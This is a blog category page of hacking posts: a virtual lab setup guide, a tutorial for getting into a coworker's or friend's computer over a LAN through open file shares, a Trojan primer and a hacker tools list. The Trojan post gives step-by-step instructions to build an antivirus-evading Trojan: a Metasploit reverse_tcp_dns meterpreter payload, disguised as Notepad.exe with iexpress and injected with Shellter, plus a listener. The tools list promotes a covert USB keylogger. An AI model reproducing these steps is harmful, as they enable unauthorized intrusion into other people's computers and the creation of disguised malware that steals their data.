Showing posts with label Geek Stuffs. Show all posts
Showing posts with label Geek Stuffs. Show all posts
Hello!

As a new guy in the hacking world, I bet you'd want to know how to create a virtual hacking lab. If you don't know what this is or you just don't care enough to create one, I suggest you read this post thoroughly because it is highly essential.


How to Create a Virtual Hacking Lab



The hacking lab creates a safe environment to practice your hacks. This way you won't have to worry about the risk of failure when trying a hack in the real world because any slip off can be devastating.


Hacking isn't like most professions. In most, you fail and dust yourself off. But in this, you fail and probably spend some time behind bars. This makes practising very important, and this is where the virtual hacking lab comes in.


Many newbies find it pretty difficult to set up a dedicated lab to practice hacks. This article does justice to this problem.


I'll be breaking the tutorial down in 6 steps to make it easier to comprehend;


  1. Download VMware Workstation or Player
  2. Download Kali VMware Images
  3. Unzip Images
  4. Open VMware Image
  5. Download & Install Targets
  6. Download Old Applications

Let's go!

Step 1: Download VMware Workstation or Player

You should practice hacking within a virtual environment. You set up a hacking system like Kali Linux, and some victims to exploit. Essentially, you'll likely want multiple OS and software to enable you try out a variety of hacks.

How to Create a Virtual Hacking Lab


Virtual machines and a virtual network offer the safest way to set up a hacking lab. 


There are numerous virtualization systems available, including Oracle's VirtualBox, KVM, Microsoft's Virtual PC and Hyper-V, Citrix, and VMware's Workstation, VMware Player and ESXi.


In a case of a lab environment, I recommend VMware's Workstation or Player. The workstation is a purchasable product that costs as high as $200 after the free 30-day trial, while the Player is free-to-use.


The difference between these two is that the Workstation can both create and play, while the Player is used to just play VMs.


Download VMware's Workstation or Player here.


Step 2; Download Kali VMware Images

After you must have installed the virtualization system, your next step is to download the VMware images of Linux(provided by offensive language). These images help you to run from Workstation or player instead of creating a virtual machine. 



These images have already been created by Offensive Security. This basically means that you can then use it in either Workstation or Player once you download the VM of Kali.


Step 3; Unzip Images

You need to unzip the downloaded files using one of the several free available zip utilities like WinZip, WinArchiver, etc. 


Download and install the one that suits your fancy and unzip the files. The screenshot below shows the unzipped Kali files using the free trial of WinZip.



Step 4; Open VMware Image

When you must have unzipped all the files, your next step is to open up the virtual machine. Be sure to know the location you unzipped the VM image.

Next is to open the Player or the VMware Workstation. Go to file and open like in the below image.

How to Create a Virtual Hacking Lab


This opens a window like in the below image.


This shows the VMware VM file that you're gonna load into VMware. Note that I'm using the "amd64" which is simply the 64-bit version. The 32-bit version will work though, but a lil bit slower.

Next, after you do so, VMware starts your VM and displays the below image.





Now, hit the little green button in your screen that says "Power on this virtual machine." It will now display a Kali screen.

How to Create a Virtual Hacking Lab

Use "root" as User and "toor" as Password to get started hacking!


Step 5; Download & Install Targets

Now, download and install your target system. You could use your own host Windows system since this is merely a practice, you might wanna use an older and easier to hack system. 


I recommend installing a Windows Vista, XP, Server 2003, or an older version of Linux. You can use these systems to practice hacking since they have known security vulnerabilities. Later, when you think you're climbing up the ladder, you can now install and use Windows 7 and 8 for your hacks.


If you don't have a copy of these older OS, you can easily purchase them on the internet. At last check, it was sold for as low as $9.66 on Amazon, but that can change anytime.


Alternatively, you can get these OS for free on torrent sites, but BEWARE!..you'll likely be downloading more than you bargained for.


These free downloads often come with rootkits that embed in your system when you open the file.


You can get older versions of Linux from the distribution.

f

Step 6; Download Old Applications

Now that you have your operating system, you're gonna be needing apps and software to run on these older versions. These older versions have plenty known security flaws that you can check your hacking skills.


You can use the website "Old Apps" to download many of these.

How to Create a Virtual Hacking Lab

Hit me up in the comment section if you got stuff to say or add on how to create a virtual hacking lab.


Subscribe to my mailing list

* indicates required

Hi there✋. 


Have you ever wondered how easy or possible it is to hack into your pal's computer? Or maybe you know it's possible but do not know the steps to follow. 

I say to you; bring out your note if you ain't with your computer. Keep reading lad.


I've always been asked by viewers on how to hack a computer. I'll be showing you one of my tricks. This trick is done in 4 steps;

  1. Getting started
  2. Trial and error
  3. Gathering necessary information
  4. Getting in

Before you keep reading though, i'll suggest you take a look at our disclaimer page.
Let's get to work!



How to hack into A Computer connected to the same network(Lan)

This trick is perfect for those working in an office where everyone is connected to the same network. It can also be carried out in a College.

What you need

  • Windows OS
  • Cain and Abel

The obvious first thing to do is find a Computer to hack into. You can begin if you're connected to the WAN or plugged into the LAN.

Open up your Cain and Abel. Get it here if you don't have it installed,

This hacking program has a built-in sniffer feature that looks for all available IP addresses in a local subnet. 

Now pay attention!

Step 1

Getting started!

Click on the sniffer tab after the software opens. Click the Start/Stop sniffer, and click the blue cross.

5 Easy steps to Hack Into a Computer



Another window will pop up after this, select “All host in my subnet” and click ok.


It'll now begin to scan

5 Easy steps to Hack Into a Computer


The Computer names, IP's and mac addresses will display. Write them down and try to remember the IP address you wish to hack into. It's okay if you can't tell whether the IP address belongs to a Computer, modem, router etc.

The next step will tell you what to do.




Step 2

Trial and error

This stage is here in case you don't know if what you have is a Computer, printer, router or whatever else is connected to the WAN.

If you did get the IP address of the target though, I still recommend you read through this
section.

Click on the start menu, type in cmd, and click ok.

This will bring up the command prompt which is where you'll be doing most of the hacking.

Next, you'll be reading certain commands in quotes that you'll need to be input into the command prompt. Do not by any way put these commands in quotes. It won't work. I put quotes only to avoid confusing you.

Type in “ping (IP address of the target).” For example in this tutorial, “ping
192.168.1.103.”

This lets you know if the target is online or not

It will look something like this if the target is online.

5 Easy steps to Hack Into a Computer

It will look like this if the target is offline:

5 Easy steps to Hack Into a Computer


This hack can only be done if the target is online. So switch to a different target if it's not or wait for it to come online.

You'd wanna know how to crack a wifi password and a website

Step 3

Gathering necessary information.

Input this command “nbtstat –a (IP address of target).” A suitable example would be
“nbtstat –a 192.168.1.103.”

This will display if file sharing is enabled. If it is, it will give you the; currently logged on user,  computer name and workgroup.

5 Easy steps to Hack Into a Computer



Step 4

Getting In

It’s time!.

By now you should know that: your target is online, has file sharing, and the computer name.

Locate the shared drives or printers. Type “net view (IP Address of Target)”
Example for this tutorial would be: “net view 192.168.1.103”



You just found the share name. In this case, "C" is under the share name signalling that C is the only shared thing on the PC or computer.

To the right, "Disk" is displayed under Type. Meaning that it is the actual C DISK of the computer. The C DISK is most times an entire person’s hard drive.



If you observe carefully, for my hack I already used “K,” so now I use “G” instead. You may do the same for multiple hacks.

It will say “The command completed successfully.” if it worked.

You may have to go retrace your steps if it didn't.

Now open “my computer” under the start menu. There your recently created network
drive will be there.



Note that you won't be able to access this drive if you disconnect from the WAN or LAN. Hence the name Network Drive.

Don't worry though, you won't have to repeat the same procedure all over again since the drive will not be deleted after you disconnect. You can still access it whenever you reconnect.



Congratulations! You’re DONE HACKING!



Commands used;

  • PING
  • NBTSTAT -a (IP Address of Target)
  • NET VIEW (IP Address of Target)
  • NET USE K: (IP Address of Target)(SHARENAME)

Program used;

Cain and Abel.

Pretty easy right? this sums up the steps to hack into a Computer.




Subscribe to my mailing list

* indicates required


spyhood | Introduction to Trojan Horse


I am pretty sure you’ve come across the movie "Troy", where Brad Pitt played Achilles. Like in the movie, a Trojan Horse is much similar to the wooden horse which was used to trick the soldiers of Troy into sneaking enemy warriors in their city.


A Trojan tends to look like a safe bet but isn’t. A Trojan horse hides malware in what appears to be a normal activity. Once entered, they will be connected to the host system and begin to pull the plugs of your computer without your consent and knowledge.


The behaviour of Trojan is in default daemon. You won’t know it is present in your computer system. At least not unless you’re a pentesting pro -). There are numerous ways a Trojan horse can look like.


1)       It sometimes looks like a malicious instruction that is hidden inside a legitimate program and carries out actions that are unwarranted and are unwanted by the user.

2)      A legit software source is altered by attaching a Trojan to it. One can easily execute this file with the help of a stub, and the legit program read as a byte. Once done, the user will see the program functioning normally and will never suspect that a Trojan was also entered into their system without his consent.


Trojans, in general, are spread by some form of social engineering. A quick example is clicking on a fake advert online, or a scenario where a user is tricked into executing an email attachment camouflaged to look unsuspicious.


Trojans may in effect allow an attacker access into the user’s information like passwords, personal identity and banking information.

Some of the most common Trojans


spyhood | Introduction to Trojan Horse


Ø  Downloader Trojan: The main focus of this kind of Trojan is to download additional malware into the already infected computer.


Ø  Backdoor Trojan: This Trojan allows the attacker access to the computer by creating a “backdoor”.


Ø  Infostealer Trojan: This kind of Trojan is specifically made to steal data from the infected computer.


Ø  Remote access Trojan: A Trojan that gives the attacker full control over the computer system.


Ø  DDoS attack Trojan: Designed to carry out DDoS attacks which flood a network with traffic, thereby taking it down.


 How to keep strong and not get wrecked by a Horse


I’ve been telling you lots of stuff on Trojan Horse which might have aroused your interest or gotten you a bit worried. Get excited bruh because Trojans aren’t bulletproof. Let’s take a look at some protection techniques;

spyhood | Introduction to Trojan Horse



Ø  Always be on the lookout for new updates for your operating system’s software. It is advisable to do this as soon as such an update comes online from the software company. The reason behind this is because attackers tend to exploit security vulnerabilities in outdated software.


Ø  Run periodic scans with your software. Computer security should begin with an internet security suite. You should set it up in a way that the program runs scans automatically in regular intervals.


Ø  Stop visiting unsafe websites. This can be done with the help of internet security suites which alerts the user if the site he’s about to visit is unsafe.


Ø  Protect all your accounts with very strong, unique passwords.


Ø  Always keep your personal information safe with a firewall.


      You must be wondering "okay, how do I know that my computer is infected?"


     My answer to that is to always be on the lookout for the following;


  •        Does your PC keep talking to you? displaying annoying popups and messages telling you that   your PC is infected and in need of protection? It can also come in a form of an advert.

  •        Applications don't start. If you've ever tried to run a program from the start menu and nothing   happens, or sometimes a different program starts, then you should worry. This could be             another problem though, but it is one of the many symptoms of an infected computer.

  •       The computer is running extremely slow. This could be as a result of many things, including a Trojan.
        
  •       You find it difficult to connect to an internet or it runs extremely slow even though the guy next to you is browsing with ease.

  •       What happened to my files? Even my antivirus! 

  •      I connect to the Internet, and different windows open or the browser provides pages I did not request

  •     If your computer starts speaking a funny language. If the default language of applications changes, the screen displays back-to-front… you really check your computer because you might just have an infected system.


Mobile Apps aren't spared from Trojan


Trojans don’t just wreck laptops and desktop machines. They can also cause havoc on a mobile device. The amount of risk taken is basically the same, except that before completing an installation on an Android app, you’ll get a giant list of all the stuff you’re giving the application access to.



The major difference between a computer and an Android phone is that it’s pretty easier to get updates and choose anti-virus protection on pc, while you have to rely solely on Google to do the work.


Computer protection is constantly being improved, while mobile protection still lives a huge gap.

You should, however, note that if a Trojan is being executed in a restrictive environment like in a case of a non-root user in a UNIX system, the Trojan will most likely not function properly(though it can still pose some great threat). But in a scenario where it is executed in a windows environment, the Trojan will be able to carry out all its functionality because the windows security is more vulnerable than the Unix.



How do Hackers create an undetectable Trojan Horse?


There'll be no point to this introduction if I don't show an example of how hackers develop Trojans. There isn't a specific rule or method. Each hacker does whatever works for him, and i'm gonna share what works here. Quite basic actually.

However, you should note that in no way is Spyhood responsible for the actions you perform with this piece of knowledge. Check the disclaimer page for more info on that.

First, let's look at the list of things you'll be needing in order to perform this task;








  • Windows
  • Kali Linux
  • A No IP account with a domain name
  • Shellter
  • A forwarded port on your router
Now let's dive in 👇to the steps

spyhood | Introduction to Trojan Horse



First step; create the DNS payload using Kali Linux


  • Open Metasploit on Kali Linux by typing msfconsole in a terminal.

  • Type use payload/windows/meterpreter/reverse_tcp_dns.

  • Type show options. You will be prompted to set your lhost and lport.

  • Type set lhost (hostname you created, without http://).

  • Type set lport (port you forwarded on your router set for the Linux machine).

  • Type generate -h to display all options for generating the payload.

  • Type generate -f (file title you chose for the payload) -p windows -t raw. Example; generate -f DNS -p windows -t raw

  • Exit the terminal and click on Files.

  • Transfer the created payload to Windows. (Be aware that your AV might detect it at its current state).


Second step; create the executable file on Windows


  • For 32-bit Windows - Navigate to C:\Windows\System32\iexpress.exe (Right click and select run as administrator). For 64-bit Windows - Navigate to C:\Windows\SysWOW64\iexpress.exe (select run as administrator)

  • Select Create new Self Extraction Directive File.

  • Click next on the Package Purpose page.

  • Name the package.  Ex: Notepad.exe

  • No Prompt, click next.

  • Do not display a license.

  • Click Add and select any file on your computer. Choose Notepad.exe in the C:\Windows\System32 folder.

  • Click the drop arrow and select the file name you choose on the last screen.

  • Choose Hidden and then click next.

  • No Message. Click Next

  • Click Browse to create a title for your malware file. Then choose a destination path. Check the Hide File Extracting Progress Animation from user.

  • Select No restart.

  • You can either choose to save the self-extraction or not.

  • Click Next on the create Package. Then Finish.


Third step; use both created files in shellter to create Trojan Horse



  • Open the Shellter folder. Right click on Shellter.exe and run as Administrator.

  • Type A for Auto.

  • Type N for No.

  • Type the location of the EXE file you created from the second step and hit enter. Let Shellter do its thing for a minute.

  • Type C for custom when asked to choose payload, 

  • Type the location of the payload you created in the first step and hit enter.

  • Type N for No reflective DLL loader.

  • Press enter to allow Shellter do its thing. You should have a working undetectable Trojan Horse If it says Injection Verified!

  • Press enter to exit Shellter.

The final step; set your listener


I'm gonna use Armitage for this tutorial.



  • Go back to Kali Linux.

  • Open the Terminal and type Msfupdate.

  • Type apt-get install armitage.

  • Type msfdb init.

  • Open Armitage.

  • Click Connect.

  • Click Yes.

  • When Armitage opens, type: use exploit/multi/handler

  • Type set lhost 0.0.0.0

  • Type set lport (the exact port you forwarded in your router)

  • Type set payload windows/meterpreter/reverse tcp dns

  • Type set exitonsession false

  • (Optional.) Type set autorunscript migrate -f

  • (Optional.) Type set prependmigrate True

  • Type exploit -j

Optional steps are used in order to migrate the entire process automatically so the session does not end before you get the chance to do it manually.



Your Trojan Horse is ready. Don't forget to check my disclaimer page to check out the part Spyhood plays in all this. Also, connect with me on Facebook if you will.





Subscribe to my mailing list

* indicates required

7 top Hacker tools and software gadgets


Batman! Probably the Superhero with the most gadgets and tools. Without his numerous tools, he’ll probably won’t raise his shoulders high in the mist of fellow Heroes.


Same is said of a Hacker lad. Without the hacker tools, there’s very little he/she can do. There’s a saying that says; “a Hacker is as good as his tools”.


If you absolutely know nothing on hacking, then you'd be needing a beginners' guide.


This article tries to do justice to some of the gadgets a hacker should have in his toolkit, covering perhaps the favourite pentesting tools as used by various types of Hackers and geeks.


NOTE: Most of these gadgets ship with common pentesting Linus distro’s like BackBox or Kali Linux, so I think it proper you install a Linux hacking box.


Alright! In no specific order, below is the list of hacker tools I’ve compiled.




Disclaimer; post contains affiliate links.

  1.  THC Hydra(password cracking tool)

THC HYDRA Hacker tools and software gadgets

Most times abbreviated to simply Hydra. This is perhaps one of the most popular password cracking tool, topping it with a very experienced development team.


THC Hydra uses a dictionary or brute force attacks when trying various login combinations on a login page. This is basically a very fast and flexible login cracker which supports plenty of protocols.


Plus new modules are pretty easy to add. This tool is completely FREE and can be downloaded.


Features of THC Hydra hacker tool

This tool currently supports;

Ø  SOCKS5

Ø  VNC

Ø  POP3

Ø  IMAP

Ø  CVS

Ø  Cisco AAA

Ø  Cisco auth

Ø  Cisco enable

Ø  SSH2

Ø  TELNET

Ø  FTP

Ø  HTTP-GET

Ø  HTTP-HEAD

Ø  HTTPS-GET

Ø  HTTP-PROXY

Ø  LDAP2 and lots more



2. OWASP ZED(web vulnerability scanner)

OWASP ZED Hacker tools and software gadgets


If you’re relatively competent in Cybersecurity, then it’s highly likely you’re quite familiar with OWASP ZED, being one of the most popular OWASP projects.


When used as a proxy server, the ZED allows you to manipulate pretty much all the traffic that goes through it, including https traffics. Cool right?


This is largely considered as being the guide of web security. The OWASP ZED is an efficient hacking tool that finds vulnerabilities in web applications. The best part is that it can be used by both professional penetration testers and those new to application security.


Features of the OWASP ZED

Some of the built-in features of this hacker tool include;


Ø  Automated scanner

Ø  Passive scanner

Ø  Forced browsing

Ø  Fuzzer

Ø  Intercepting proxy server

Ø  Traditional and AJAX web crawlers

Ø  WebSocket support

Ø  Scripting languages

Ø  Plug-n-hack support


The architecture is plugin-based, and it also contains an online marketplace which allows updated features to be added. Plus its totally free.


I’d totally recommend you adding this to the list of your gadget.


3. NMAP(network mapper)

NMAP Hacker tools and software gadgets


The network mapper, a popular open source hacker tool mainly used for security auditing and network discovery, thus building a map of the network.


The tool uses IP packets to determine the hosts available on a network and the kind of services those hosts provide data about.


One of the core benefits of using NMAP is that you’ll be able to determine whether or not the network is in need of patching. There’s another version of this tool called Zenmap. This is actually the GUI version of NMAP, both performing almost the same.


I’d say; first learn NMAP, since it’s easier for beginners to learn. You can choose to move over to Zenmap when you feel like it.


NMAP is a multipurpose gadget which can function on many different OS including; BSD, Linux and Mac.

Features of NMAP


Ø  Port scanning

Ø  Version detection

Ø  OS detection

Ø  Host discovery

Ø  Scriptable interaction with the target

Ø  Auditing the security of a firewall

Ø  Network mapping

Ø  Finding and exploiting vulnerabilities in a network


How the result is reported


NMAP provides 4 output formats which are all saved to a file. All but the interactive output. Let’s take a look at different ways NMAP gives its output;


Ø  XML: This is a format that is processed by XML tools. Using XSLT, it can be further converted into an HTML report.


Ø  Interactive: Presented and updated when you run NMAP from the command line.


Ø  Normal: This is the output you see while operating NMAP from the command line.


Ø   Grepable: This is the output that is shaped to line-oriented processing gadget i.e awk, sed or grep.


Ø  Script kiddie: This is an amusing way to format the interactive output. In this type of output, you replace letters with visually alike number representations. E.g Interacting ports becomes int3eract1ng p0rtz


 4.  Keyllama USB Keylogger tools


Keyllama USB Keylogger

Arguably the most undetectable software out there, the Keyllama USB Keylogger is definitely the flash drive you don’t want anywhere near any of your computers.


As one of the leading names in Keyloggers, the Keyllama is used in settling legal matters where reliability is absolutely crucial. They centre on hardware-centric method, not relying on any software to carry out any hack, and activates immediately it is plugged in.


The Keyllama tool comes with a 16mb, 8mb or 4mb storage types. Topping it with an extremely low failure rate and is capable of storing quite a lot of data(not minding the storage size).


The coolest stuff about this Keylogger is that it can easily be inserted into wireless keyboards as well.

Design

Hacker tools and software gadgets

This cool hacker tool is designed to be discreet; appearing not more than a tiny USB memory key(it extends 1.8” from the back of your computer/machine).


I’d say it is the most minimalist looking keylogger on the market right now.

Security


This Keylogger assesses the data being transmitted by the keyboard, records all of it, then pushes the information back to the computer. There is utterly no way the software can detect this tool.


You’ll be needed to choose a password when you’re first setting it up. This password, however, isn’t just to allow you to access data, but also to set up a complex encrypted algorithm.


This is so, in the event that someone manages to get their hands on this Keylogger, they absolutely wouldn’t have any idea what information was inside. It’ll completely look like gibberish.


This is essential for hackers, as it combines swiftness and reliability. 


You can check it out right here on Amazon.


5. Metasploit penetration testing software

metasploit top Hacker tools and software gadgets


If you’re new to Metasploit, then think of it as a list of hacker tools and frameworks used to execute various tasks.


Metasploit along with NMAP is probably the two most common hacking software out there. This software is a must learn if you’re interested in venturing into penetration testing.


IT security courses such as CEH and OSCP always include a Metasploit component. Metasploit is a project that provides you with crucial information regarding computer security vulnerabilities and helps devise IDS testing and penetration testing strategies.


The Metasploit runs on Unix and Windows, but the easiest way to use this tool is to get a penetration testing arsenal that includes the Metasploit framework such as the OS, Kali Linux.


Metasploit framework


The steps for exploiting a system using the framework includes;

Ø  Choosing and setting up an exploit.

Ø  Optionally checking if the proposed target system is prone to the chosen exploit.

Ø  Choosing and setting up a payload.

Ø  Choosing the encoding method.

Ø  Executing the exploit.


This method, allowing the blending of exploits to any payload is the main driving factor of the Framework. It facilitates the task of payload writers, exploits writers and attackers.


One can’t really explain everything there is on this subject. There’re tons of good Metasploit information on the net, but probably not as good as this book, as it is well written and guides perfectly.

You'd probably need to know some list of hacker terms.

6. John the Ripper(hacker password cracking tool)

john the ripper hacker tools and softwares gadgets


The coolest name yet for a Hacker software. Often abbreviated as ‘JTR’, or called just ‘John’, this piece of software is designed to crack very complicated passwords. This tool is very similar to THC Hydra.


John is a common password cracking pentesting tool that is used mainly when performing a dictionary attack. It combines various password crackers into a single package, includes a customizable cracker and autodetects password hash types.


This free password hacking software was first created for just the Unix OS. It now runs on 15 other platforms, 11 of which are architecture-specific versions of Unix.


The JTR runs against plenty encrypted password formats, including different hash types crypt password. These are commonly found on the Windows NT/2000/XP/2003 LM hash, Unix versions and the Kerberos AFS.


If you’re a bit confused between THC Hydra and John the Ripper, then think of JTR as an offline password cracker, while Hydra is an online cracker.


7. Cain and Abel Hacking software


cain and abel hacker tools and software gadget

Often abbreviated as Cain, this is a password recovery tool for Windows. It’s able to recover many types of passwords using techniques such as cracking various password hashes(using dictionary attack), network packet sniffing, cryptanalysis and brute force.


This hacking tool is often mentioned in variety of hacking tutorials. Cain and Abel were primarily built as a password recovery tool for Microsoft, but it can also be used in a variety of uses.

Some features of Cain and Abel


Ø  WEP cracking

Ø  Calculating hashes

Ø  Revealing password boxes

Ø  Uncovering cached passwords

Ø  Ability to record VoIP conversations

Ø  Dumping protected storage passwords


Stopping here doesn't give accolade to the several hacking tools and software out there. Some great ones weren't named due to them having very similar characteristics with the above mentioned.

Nevertheless, let's check out the other tools worth mentioning, shall we?


  • Wireshark(web vulnerability scanner)

  • Aircrack-ng(password cracking tool)

  • Nikto website vulnerability scanner

  • Maltego(Digital forensics)

  • DS logic pro(logic analyzer)

  • oclHashcat(password cracking tool)

  • Nessus vulnerability scanner

  • Social Engineering tool kit(framework for simulating multiple types of attacks)

The list goes on and on. 



Subscribe to my mailing list

* indicates required